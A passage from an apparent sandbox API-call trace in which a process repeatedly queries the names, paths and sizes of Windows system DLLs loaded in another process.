returned 0x1f [0054.499] CoTaskMemFree (pv=0x783720) [0054.499] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa0d0000, lpmodinfo=0x265a068, cb=0x18 | out: lpmodinfo=0x265a068*(lpBaseOfDll=0x7fefa0d0000, SizeOfImage=0x12000, EntryPoint=0x7fefa0d1050)) returned 1 [0054.502] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.502] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa0d0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="AEPIC.dll") returned 0x9 [0054.504] CoTaskMemFree (pv=0x783720) [0054.504] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.504] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa0d0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\AEPIC.dll" (normalized: "c:\\windows\\system32\\aepic.dll")) returned 0x1d [0054.508] CoTaskMemFree (pv=0x783720) [0054.508] GetModuleInformation (in: hProcess=0x21c, hModule=0x73ff0000, lpmodinfo=0x265c228, cb=0x18 | out: lpmodinfo=0x265c228*(lpBaseOfDll=0x73ff0000, SizeOfImage=0x3000, EntryPoint=0x0)) returned 1 [0054.512] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.512] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x73ff0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="sfc.dll") returned 0x7 [0054.515] CoTaskMemFree (pv=0x783720) [0054.515] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.515] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x73ff0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")) returned 0x1b [0054.519] CoTaskMemFree (pv=0x783720) [0054.519] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa0c0000, lpmodinfo=0x265e3d8, cb=0x18 | out: lpmodinfo=0x265e3d8*(lpBaseOfDll=0x7fefa0c0000, SizeOfImage=0x10000, EntryPoint=0x7fefa0c1010)) returned 1 [0054.523] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.523] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa0c0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="sfc_os.DLL") returned 0xa [0054.526] CoTaskMemFree (pv=0x783720) [0054.526] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.526] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa0c0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\sfc_os.DLL" (normalized: "c:\\windows\\system32\\sfc_os.dll")) returned 0x1e [0054.530] CoTaskMemFree (pv=0x783720) [0054.530] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefc940000, lpmodinfo=0x2660598, cb=0x18 | out: lpmodinfo=0x2660598*(lpBaseOfDll=0x7fefc940000, SizeOfImage=0xc000, EntryPoint=0x7fefc941064)) returned 1 [0054.534] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.534] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefc940000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0054.538] CoTaskMemFree (pv=0x783720) [0054.538] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.538] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefc940000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\VERSION.dll" (normalized: "c:\\windows\\system32\\version.dll")) returned 0x1f [0054.542] CoTaskMemFree (pv=0x783720) [0054.542] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd2a0000, lpmodinfo=0x2662758, cb=0x18 | out: lpmodinfo=0x2662758*(lpBaseOfDll=0x7fefd2a0000, SizeOfImage=0x6d000, EntryPoint=0x7fefd2a1010)) returned 1 [0054.545] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.545] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd2a0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wevtapi.dll") returned 0xb [0054.548] CoTaskMemFree (pv=0x783720) [0054.548] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.548] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd2a0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")) returned 0x1f [0054.551] CoTaskMemFree (pv=0x783720) [0054.551] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefe070000, lpmodinfo=0x2664918, cb=0x18 | out: lpmodinfo=0x2664918*(lpBaseOfDll=0x7fefe070000, SizeOfImage=0xd88000, EntryPoint=0x7fefe0ecebc)) returned 1 [0054.554] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.554] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefe070000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="SHELL32.dll") returned 0xb [0054.557] CoTaskMemFree (pv=0x783720) [0054.557] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.557] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefe070000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\SHELL32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")) returned 0x1f [0054.560] CoTaskMemFree (pv=0x783720) [0054.560] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb800000, lpmodinfo=0x2666af0, cb=0x18 | out: lpmodinfo=0x2666af0*(lpBaseOfDll=0x7fefb800000, SizeOfImage=0x2d000, EntryPoint=0x7fefb801010)) returned 1 [0054.563] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.563] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb800000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="ntmarta.dll") returned 0xb [0054.566] CoTaskMemFree (pv=0x783720) [0054.566] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.566] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb800000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")) returned 0x1f [0054.569] CoTaskMemFree (pv=0x783720) [0054.569] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feffae0000, lpmodinfo=0x2668cb0, cb=0x18 | out: lpmodinfo=0x2668cb0*(lpBaseOfDll=0x7feffae0000, SizeOfImage=0x52000, EntryPoint=0x7feffae10d4)) returned 1 [0054.572] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.572] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feffae0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WLDAP32.dll") returned 0xb [0054.575] CoTaskMemFree (pv=0x783720) [0054.575] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.575] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feffae0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WLDAP32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")) returned 0x1f [0054.579] CoTaskMemFree (pv=0x783720) [0054.579] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9ee0000, lpmodinfo=0x266ae70, cb=0x18 | out: lpmodinfo=0x266ae70*(lpBaseOfDll=0x7fef9ee0000, SizeOfImage=0x22000, EntryPoint=0x7fef9ee1020)) returned 1 [0054.581] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.581] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9ee0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="trkwks.dll") returned 0xa [0054.584] CoTaskMemFree (pv=0x783720) [0054.584] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.585] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9ee0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\trkwks.dll" (normalized: "c:\\windows\\system32\\trkwks.dll")) returned 0x1e [0054.588] CoTaskMemFree (pv=0x783720) [0054.588] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefa1b0000, lpmodinfo=0x266d030, cb=0x18 | out: lpmodinfo=0x266d030*(lpBaseOfDll=0x7fefa1b0000, SizeOfImage=0x19000, EntryPoint=0x7fefa1b2b50)) returned 1 [0054.591] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.591] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefa1b0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wdi.dll") returned 0x7 [0054.594] CoTaskMemFree (pv=0x783720) [0054.594] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.594] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefa1b0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\wdi.dll" (normalized: "c:\\windows\\system32\\wdi.dll")) returned 0x1b [0054.597] CoTaskMemFree (pv=0x783720) [0054.597] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef92e0000, lpmodinfo=0x266f1e0, cb=0x18 | out: lpmodinfo=0x266f1e0*(lpBaseOfDll=0x7fef92e0000, SizeOfImage=0xbd000, EntryPoint=0x7fef92e1ea4)) returned 1 [0054.600] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.600] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef92e0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="PortableDeviceApi.dll") returned 0x15 [0054.604] CoTaskMemFree (pv=0x783720) [0054.604] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.604] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef92e0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll")) returned 0x29 [0054.607] CoTaskMemFree (pv=0x783720) [0054.607] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9280000, lpmodinfo=0x26713d0, cb=0x18 | out: lpmodinfo=0x26713d0*(lpBaseOfDll=0x7fef9280000, SizeOfImage=0x17000, EntryPoint=0x7fef928d308)) returned 1 [0054.611] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.611] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9280000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="portabledeviceconnectapi.dll") returned 0x1c [0054.615] CoTaskMemFree (pv=0x783720) [0054.615] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.615] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9280000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\portabledeviceconnectapi.dll" (normalized: "c:\\windows\\system32\\portabledeviceconnectapi.dll")) returned 0x30 [0054.620] CoTaskMemFree (pv=0x783720) [0054.620] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd830000, lpmodinfo=0x26735e0, cb=0x18 | out: lpmodinfo=0x26735e0*(lpBaseOfDll=0x7fefd830000, SizeOfImage=0x3b000, EntryPoint=0x7fefd831324)) returned 1 [0054.624] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.624] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WINTRUST.dll") returned 0xc [0054.628] CoTaskMemFree (pv=0x783720) [0054.628] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.628] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WINTRUST.dll" (normalized: "c:\\windows\\system32\\wintrust.dll")) returned 0x20 [0054.632] CoTaskMemFree (pv=0x783720) [0054.632] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd9e0000, lpmodinfo=0x26757b0, cb=0x18 | out: lpmodinfo=0x26757b0*(lpBaseOfDll=0x7fefd9e0000, SizeOfImage=0x16d000, EntryPoint=0x7fefd9e10b4)) returned 1 [0054.637] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.637] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd9e0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0054.641] CoTaskMemFree (pv=0x783720) [0054.641] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.641] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd9e0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\CRYPT32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")) returned 0x1f [0054.646] CoTaskMemFree (pv=0x783720) [0054.646] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefd820000, lpmodinfo=0x2677970, cb=0x18 | out: lpmodinfo=0x2677970*(lpBaseOfDll=0x7fefd820000, SizeOfImage=0xf000, EntryPoint=0x7fefd821020)) returned 1 [0054.650] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.650] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefd820000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0054.655] CoTaskMemFree (pv=0x783720) [0054.655] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.655] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefd820000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\MSASN1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")) returned 0x1e [0054.659] CoTaskMemFree (pv=0x783720) [0054.659] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9270000, lpmodinfo=0x2679b30, cb=0x18 | out: lpmodinfo=0x2679b30*(lpBaseOfDll=0x7fef9270000, SizeOfImage=0xc000, EntryPoint=0x7fef927419c)) returned 1 [0054.664] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.664] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9270000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="APPHLPDM.DLL") returned 0xc [0054.668] CoTaskMemFree (pv=0x783720) [0054.668] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.668] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9270000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\APPHLPDM.DLL" (normalized: "c:\\windows\\system32\\apphlpdm.dll")) returned 0x20 [0054.673] CoTaskMemFree (pv=0x783720) [0054.673] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef93a0000, lpmodinfo=0x267bd00, cb=0x18 | out: lpmodinfo=0x267bd00*(lpBaseOfDll=0x7fef93a0000, SizeOfImage=0x7c000, EntryPoint=0x7fef93a11d4)) returned 1 [0054.677] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.677] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef93a0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="wer.dll") returned 0x7 [0054.683] CoTaskMemFree (pv=0x783720) [0054.683] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.683] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef93a0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll")) returned 0x1b [0054.688] CoTaskMemFree (pv=0x783720) [0054.688] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef66b0000, lpmodinfo=0x267deb0, cb=0x18 | out: lpmodinfo=0x267deb0*(lpBaseOfDll=0x7fef66b0000, SizeOfImage=0x5c000, EntryPoint=0x7fef66b8c20)) returned 1 [0054.692] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.692] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef66b0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="netman.dll") returned 0xa [0054.697] CoTaskMemFree (pv=0x783720) [0054.697] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.697] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef66b0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\netman.dll" (normalized: "c:\\windows\\system32\\netman.dll")) returned 0x1e [0054.702] CoTaskMemFree (pv=0x783720) [0054.702] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff9c0000, lpmodinfo=0x2680488, cb=0x18 | out: lpmodinfo=0x2680488*(lpBaseOfDll=0x7feff9c0000, SizeOfImage=0x8000, EntryPoint=0x7feff9c1504)) returned 1 [0054.706] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.706] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff9c0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0054.711] CoTaskMemFree (pv=0x783720) [0054.711] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.711] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff9c0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\NSI.dll" (normalized: "c:\\windows\\system32\\nsi.dll")) returned 0x1b [0054.717] CoTaskMemFree (pv=0x783720) [0054.717] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb260000, lpmodinfo=0x2682638, cb=0x18 | out: lpmodinfo=0x2682638*(lpBaseOfDll=0x7fefb260000, SizeOfImage=0xb000, EntryPoint=0x7fefb261198)) returned 1 [0054.723] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.723] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb260000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0054.729] CoTaskMemFree (pv=0x783720) [0054.729] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.729] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb260000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="c:\\windows\\system32\\WINNSI.DLL" (normalized: "c:\\windows\\system32\\winnsi.dll")) returned 0x1e [0054.733] CoTaskMemFree (pv=0x783720) [0054.733] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef6950000, lpmodinfo=0x26847f8, cb=0x18 | out: lpmodinfo=0x26847f8*(lpBaseOfDll=0x7fef6950000, SizeOfImage=0x28b000, EntryPoint=0x7fef6956f5c)) returned 1 [0054.736] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.736] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef6950000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="netshell.dll") returned 0xc [0054.740] CoTaskMemFree (pv=0x783720) [0054.740] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.740] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef6950000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll")) returned 0x20 [0054.744] CoTaskMemFree (pv=0x783720) [0054.744] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb270000, lpmodinfo=0x26869c8, cb=0x18 | out: lpmodinfo=0x26869c8*(lpBaseOfDll=0x7fefb270000, SizeOfImage=0x27000, EntryPoint=0x7fefb2798bc)) returned 1 [0054.748] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.748] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb270000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0054.751] CoTaskMemFree (pv=0x783720) [0054.751] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.752] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb270000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")) returned 0x20 [0054.755] CoTaskMemFree (pv=0x783720) [0054.755] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb3f0000, lpmodinfo=0x2688bb0, cb=0x18 | out: lpmodinfo=0x2688bb0*(lpBaseOfDll=0x7fefb3f0000, SizeOfImage=0x15000, EntryPoint=0x7fefb3f60d8)) returned 1 [0054.759] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.759] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb3f0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="nlaapi.dll") returned 0xa [0054.763] CoTaskMemFree (pv=0x783720) [0054.763] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.763] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb3f0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")) returned 0x1e [0054.767] CoTaskMemFree (pv=0x783720) [0054.767] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef65d0000, lpmodinfo=0x268ad70, cb=0x18 | out: lpmodinfo=0x268ad70*(lpBaseOfDll=0x7fef65d0000, SizeOfImage=0xd8000, EntryPoint=0x7fef6638bd0)) returned 1 [0054.770] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.770] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef65d0000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="RASDLG.dll") returned 0xa [0054.775] CoTaskMemFree (pv=0x783720) [0054.775] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.775] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef65d0000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\RASDLG.dll" (normalized: "c:\\windows\\system32\\rasdlg.dll")) returned 0x1e [0054.779] CoTaskMemFree (pv=0x783720) [0054.779] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef6590000, lpmodinfo=0x268cf30, cb=0x18 | out: lpmodinfo=0x268cf30*(lpBaseOfDll=0x7fef6590000, SizeOfImage=0x3a000, EntryPoint=0x7fef6591010)) returned 1 [0054.782] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.782] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef6590000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="MPRAPI.dll") returned 0xa [0054.786] CoTaskMemFree (pv=0x783720) [0054.786] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.786] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef6590000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\MPRAPI.dll" (normalized: "c:\\windows\\system32\\mprapi.dll")) returned 0x1e [0054.799] CoTaskMemFree (pv=0x783720) [0054.799] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef6520000, lpmodinfo=0x268f0f0, cb=0x18 | out: lpmodinfo=0x268f0f0*(lpBaseOfDll=0x7fef6520000, SizeOfImage=0x62000, EntryPoint=0x7fef6521198)) returned 1 [0054.804] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.804] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef6520000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="RASAPI32.dll") returned 0xc [0054.808] CoTaskMemFree (pv=0x783720) [0054.808] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.808] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef6520000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\RASAPI32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll")) returned 0x20 [0054.812] CoTaskMemFree (pv=0x783720) [0054.812] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef6500000, lpmodinfo=0x26912c0, cb=0x18 | out: lpmodinfo=0x26912c0*(lpBaseOfDll=0x7fef6500000, SizeOfImage=0x1c000, EntryPoint=0x7fef65011a0)) returned 1 [0054.817] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.817] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef6500000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0054.862] CoTaskMemFree (pv=0x783720) [0054.862] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.862] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef6500000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll")) returned 0x1e [0054.867] CoTaskMemFree (pv=0x783720) [0054.867] GetModuleInformation (in: hProcess=0x21c, hModule=0x7feff970000, lpmodinfo=0x2693480, cb=0x18 | out: lpmodinfo=0x2693480*(lpBaseOfDll=0x7feff970000, SizeOfImage=0x4d000, EntryPoint=0x7feff971070)) returned 1 [0054.872] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.872] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7feff970000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="WS2_32.dll") returned 0xa [0054.877] CoTaskMemFree (pv=0x783720) [0054.877] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.877] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7feff970000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\WS2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")) returned 0x1e [0054.881] CoTaskMemFree (pv=0x783720) [0054.881] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb830000, lpmodinfo=0x2695640, cb=0x18 | out: lpmodinfo=0x2695640*(lpBaseOfDll=0x7fefb830000, SizeOfImage=0x11000, EntryPoint=0x7fefb8314c0)) returned 1 [0054.886] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.886] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb830000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0054.890] CoTaskMemFree (pv=0x783720) [0054.891] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.891] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb830000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")) returned 0x1f [0054.895] CoTaskMemFree (pv=0x783720) [0054.895] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefb330000, lpmodinfo=0x2697800, cb=0x18 | out: lpmodinfo=0x2697800*(lpBaseOfDll=0x7fefb330000, SizeOfImage=0xc000, EntryPoint=0x7fefb3315d8)) returned 1 [0054.899] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.899] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefb330000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="dsrole.dll") returned 0xa [0054.904] CoTaskMemFree (pv=0x783720) [0054.904] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.904] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefb330000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")) returned 0x1e [0054.908] CoTaskMemFree (pv=0x783720) [0054.908] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fef9a80000, lpmodinfo=0x26999c0, cb=0x18 | out: lpmodinfo=0x26999c0*(lpBaseOfDll=0x7fef9a80000, SizeOfImage=0x84000, EntryPoint=0x7fef9ad1118)) returned 1 [0054.912] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.912] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fef9a80000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="netcfgx.dll") returned 0xb [0054.917] CoTaskMemFree (pv=0x783720) [0054.917] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.917] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fef9a80000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll")) returned 0x1f [0054.922] CoTaskMemFree (pv=0x783720) [0054.922] GetModuleInformation (in: hProcess=0x21c, hModule=0x7fefcb40000, lpmodinfo=0x269bb80, cb=0x18 | out: lpmodinfo=0x269bb80*(lpBaseOfDll=0x7fefcb40000, SizeOfImage=0x12000, EntryPoint=0x7fefcb41060)) returned 1 [0054.926] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.926] GetModuleBaseNameW (in: hProcess=0x21c, hModule=0x7fefcb40000, lpBaseName=0x783720, nSize=0x800 | out: lpBaseName="devrtl.DLL") returned 0xa [0054.930] CoTaskMemFree (pv=0x783720) [0054.930] CoTaskMemAlloc (cb=0x804) returned 0x783720 [0054.930] GetModuleFileNameExW (in: hProcess=0x21c, hModule=0x7fefcb40000, lpFilename=0x783720, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\devrtl.DLL" (normalized: "c:\\windows\\system32\\devrtl.dll")) returned 0x1e [0054.934] 